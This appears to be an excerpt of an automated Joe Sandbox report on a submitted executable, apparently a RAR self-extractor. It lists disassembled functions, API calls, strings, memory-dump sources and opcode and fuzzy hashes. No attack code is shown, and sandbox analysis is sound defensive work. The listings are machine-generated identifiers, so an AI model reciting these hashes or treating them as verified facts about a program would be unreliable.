                                                            • Instruction ID: da5e6a227e21c59eb79db9d22739b1d0a504fafcae1b376581812328ea2b16dd
                                                            • Opcode Fuzzy Hash: 4779cb78c4f0597e8020061da7553de5984359de3cd6579292631da86ca501b3
                                                            • Instruction Fuzzy Hash: E3F0EC72B04610AFD6A0EB68E989C5B77DBBF457107644816F488E7611CE78FC808B60
                                                            Function 00053308 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00053310
                                                            • _wcslen.LIBCMT ref: 00053321
                                                            • _wcslen.LIBCMT ref: 00053331
                                                            • _wcslen.LIBCMT ref: 0005333F
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0004C824,?,?,00000000,?,?,?), ref: 0005335A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            • Opcode ID: df9aed898cb248ec2a902634b6a1cd197b085821bde2363fa7b92205b5a10a86
                                                            • Instruction ID: 12b5fe9a52535c06d644559ddb7d30c099c532292579936e5baa8661e2358688
                                                            • Opcode Fuzzy Hash: df9aed898cb248ec2a902634b6a1cd197b085821bde2363fa7b92205b5a10a86
                                                            • Instruction Fuzzy Hash: B5F01732508114BBCF222F55EC09CCF3F26EB45BA1B228015FA1A6A462CE3296999691
                                                            Function 00069B20 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00069B3E
                                                              • Part of subcall function 0006A4BA: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?), ref: 0006A4D0
                                                              • Part of subcall function 0006A4BA: GetLastError.KERNEL32(?,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?,?), ref: 0006A4E2
                                                            • _free.LIBCMT ref: 00069B50
                                                            • _free.LIBCMT ref: 00069B63
                                                            • _free.LIBCMT ref: 00069B74
                                                            • _free.LIBCMT ref: 00069B85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 7a45daa6592f280f78039bcb42b20fdfe704d4bbb47898899282d71ced973167
                                                            • Instruction ID: 048d6022db305618bc2cd9ece01d30f3ed5602053f9e084cd959ddc59fbf2905
                                                            • Opcode Fuzzy Hash: 7a45daa6592f280f78039bcb42b20fdfe704d4bbb47898899282d71ced973167
                                                            • Instruction Fuzzy Hash: E4F05E789059209BF6417F14FC4645A3BA7FBD77203514626F81962272CBFD48029F91
                                                            Function 00052918 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            • Opcode ID: 162139932b92e932f6c770e009bcd4c0cc27997466e553a021746ea44381bcd5
                                                            • Instruction ID: 455eaf26493361d2cb9ed3eb27ed67a199e23521f3362c5b4cd15857e5259bad
                                                            • Opcode Fuzzy Hash: 162139932b92e932f6c770e009bcd4c0cc27997466e553a021746ea44381bcd5
                                                            • Instruction Fuzzy Hash: B3510671688302FAFA311E908D02F7F7695AF07B03F244616BF86740E7C6A16958B71B
                                                            Function 00069180 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\4wx72yFLka.exe,00000104), ref: 000691C0
                                                            • _free.LIBCMT ref: 0006928B
                                                            • _free.LIBCMT ref: 00069295
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\4wx72yFLka.exe
                                                            • API String ID: 2506810119-3764473980
                                                            • Opcode ID: 563eb2804663d8b99429048d0fdd2fd414c4f0922b6f9aa5fe27ddbfe808267c
                                                            • Instruction ID: 736af70b34cced3c4ffb705adf002e83942a15e3cc94349d0e838566bc3fe6ad
                                                            • Opcode Fuzzy Hash: 563eb2804663d8b99429048d0fdd2fd414c4f0922b6f9aa5fe27ddbfe808267c
                                                            • Instruction Fuzzy Hash: 5C319F71A04649FFEB21DB99DC85DAEBBEEEF86710F104066F80497602D7B48E408B91
                                                            Function 000641B6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 000641DB
                                                            • _abort.LIBCMT ref: 000642E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            • Opcode ID: 7d735adfd9f728bc71450f0cdf4990f6c8a434d91782aa052623d69abd0df384
                                                            • Instruction ID: 7ef1a4c8bd5b411bf6894e8302b429ee5b31ab7ab1dad83f8a4eb128912c158b
                                                            • Opcode Fuzzy Hash: 7d735adfd9f728bc71450f0cdf4990f6c8a434d91782aa052623d69abd0df384
                                                            • Instruction Fuzzy Hash: C4416B7190020AAFCF15DF98DC91AEEBBF6FF48304F688159FA04A7262D3359A50DB50
                                                            Function 00047EFB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00047F00
                                                              • Part of subcall function 000442DA: __EH_prolog.LIBCMT ref: 000442DF
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00047FC5
                                                              • Part of subcall function 000486E4: GetCurrentProcess.KERNEL32(00000020,?), ref: 000486F3
                                                              • Part of subcall function 000486E4: GetLastError.KERNEL32 ref: 00048739
                                                              • Part of subcall function 000486E4: CloseHandle.KERNEL32(?), ref: 00048748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            • Opcode ID: 43cdb9478a311d35942e7b3a2bf640ffe60d75868a0d4d6d18159c33d5d82197
                                                            • Instruction ID: 5dc01d00ef30749bfa2d19fbabac339cdff45331d4b307c4a06b913480d21033
                                                            • Opcode Fuzzy Hash: 43cdb9478a311d35942e7b3a2bf640ffe60d75868a0d4d6d18159c33d5d82197
                                                            • Instruction Fuzzy Hash: 4631C8B1944244BAEF61EB64DC05FFE77A9BB44704F004036F949E7192DB788949CB64
                                                            Function 0005BDB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                              • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            • EndDialog.USER32(?,00000001), ref: 0005BE38
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0005BE4D
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 0005BE62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            • Opcode ID: 1cfa1a4795ceffc1b9a5ddc126f9730a82ef31f2c5f48ec5069c977986fc5b77
                                                            • Instruction ID: c418bdf585617ca280cc18923430205226762ff9b116e1ab0b05044dfe7f393d
                                                            • Opcode Fuzzy Hash: 1cfa1a4795ceffc1b9a5ddc126f9730a82ef31f2c5f48ec5069c977986fc5b77
                                                            • Instruction Fuzzy Hash: C611D632600611BFE6219F649D47FBB77A9FB4BB02F080011FB40AB0B5C766AD059765
                                                            Function 0004EBEC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 0004EC54
                                                            • _strncpy.LIBCMT ref: 0004EC9A
                                                              • Part of subcall function 000530C5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00083070,?,0004EC28,00000000,?,00000050,00083070), ref: 000530E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            • Opcode ID: 612b387d7c9e5192f5a3db4afd794858d8e907d3b69a33185c5527c2253ea975
                                                            • Instruction ID: 3ff44a9b85ba7bd3eb02651d2cc455e409e3082e7270b1e8328b8c5f5866f261
                                                            • Opcode Fuzzy Hash: 612b387d7c9e5192f5a3db4afd794858d8e907d3b69a33185c5527c2253ea975
                                                            • Instruction Fuzzy Hash: C22181B294024CAEEB20DFA4CD85FEF3BE8BF04300F040532FA159A192E771D6558B55
                                                            Function 0005213F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0004C02A,00000008,?,00000000,?,0004E665,?,00000000), ref: 0005217E
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0004C02A,00000008,?,00000000,?,0004E665,?,00000000), ref: 00052188
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0004C02A,00000008,?,00000000,?,0004E665,?,00000000), ref: 00052198
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 000521B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: 862bfc603b81cf11891335224b99c95230a8c9159021c9aee15abd5c104c0b36
                                                            • Instruction ID: 71f900cbc056bb3aa265993aabf083e8e1a6e0b24a109554a5d89b3fbf0c7cd4
                                                            • Opcode Fuzzy Hash: 862bfc603b81cf11891335224b99c95230a8c9159021c9aee15abd5c104c0b36
                                                            • Instruction Fuzzy Hash: 571194B1604B049FD3215F699C849A7FBDCEF65745F10482EF6DAC2200D77559408B68
                                                            Function 0005C300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                              • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            • EndDialog.USER32(?,00000001), ref: 0005C34E
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 0005C366
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 0005C394
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1
                                                            • API String ID: 445417207-3292211884
                                                            • Opcode ID: 314b77840878b09ae40d59e9b76b77b4c616c96d301fe2defa51da6a6cc11188
                                                            • Instruction ID: e2db1c296bdb8ed69aa067ccdcd2790301ce7fa91385de58b6937f794ead6d61
                                                            • Opcode Fuzzy Hash: 314b77840878b09ae40d59e9b76b77b4c616c96d301fe2defa51da6a6cc11188
                                                            • Instruction Fuzzy Hash: 6A11657290021CBAEB205B649D89FFF377DEB4A756F004421FF05F6081C2B59A1A96A5
                                                            Function 0005ECAD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: 08e2eed53249fa8685a33f99ebba65875abb1cd0e408e82a1a4b1dcf9a53581b
                                                            • Instruction ID: db2f7488082821f41f499e8380a229bf4be04494c2d9ba22120278e15486d83d
                                                            • Opcode Fuzzy Hash: 08e2eed53249fa8685a33f99ebba65875abb1cd0e408e82a1a4b1dcf9a53581b
                                                            • Instruction Fuzzy Hash: F201D871604684AFFB154F28EC04A573FA8F75A396F004426FD8582230D3798954DBB1
                                                            Function 00044940 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00044945
                                                              • Part of subcall function 0005FB6D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0005FB79
                                                              • Part of subcall function 0005FB6D: ___delayLoadHelper2@8.DELAYIMP ref: 0005FB9F
                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00044950
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                                            • String ID: string too long$vector too long
                                                            • API String ID: 2355824318-1617939282
                                                            • Opcode ID: ff7d4abb8d624d7aa2ad1222467f783b556ebe4dadeeeaebcb1996c1aced1141
                                                            • Instruction ID: 546b2ac3b5bb57e77bdd4753e7c117cf4a517b193c6514e6ffbf61ae74b0f4a1
                                                            • Opcode Fuzzy Hash: ff7d4abb8d624d7aa2ad1222467f783b556ebe4dadeeeaebcb1996c1aced1141
                                                            • Instruction Fuzzy Hash: 01F0A7B1210314AB86247F59EC4594BB3EDEF85B51310492EF945C7606C3B0ED0487B9
                                                            Function 0005EBAE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0005EBC4
                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0005EC00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: 8025381ba5bdcf75765586444b82585d866244e383ee3d625cf02f1f0aa1099b
                                                            • Instruction ID: d16fd20dd0deba82952d89669a73b0a65f785bfc331fcb036e3f119ab13e9f52
                                                            • Opcode Fuzzy Hash: 8025381ba5bdcf75765586444b82585d866244e383ee3d625cf02f1f0aa1099b
                                                            • Instruction Fuzzy Hash: 30F0A7B1C01234A6DB203B90CC0AEFB3A9CDF14B43B450061FD8A66092E769C988C6B1
                                                            Function 0006AA2A Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 11928e2537a4dd367eb88350d438216194463e35c46b68634b5d5fb98095dd98
                                                            • Instruction ID: 4a7498bce9d91d03bae367a448774e322cb0fa81e146e7561ede498639d0e350
                                                            • Opcode Fuzzy Hash: 11928e2537a4dd367eb88350d438216194463e35c46b68634b5d5fb98095dd98
                                                            • Instruction Fuzzy Hash: F2A13971B007869FEB21EF58C8917AEBBE7EF56320F144169D585AB242C3389D41CF52
                                                            Function 0004B72D Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00048D3C,?,?,?), ref: 0004B7D3
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00048D3C,?,?), ref: 0004B817
                                                            • SetFileTime.KERNEL32(?,00048ACC,?,00000000,?,00000800,?,00048D3C,?,?,?,?,?,?,?,?), ref: 0004B898
                                                            • CloseHandle.KERNEL32(?,?,00000800,?,00048D3C,?,?,?,?,?,?,?,?,?,?), ref: 0004B89F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
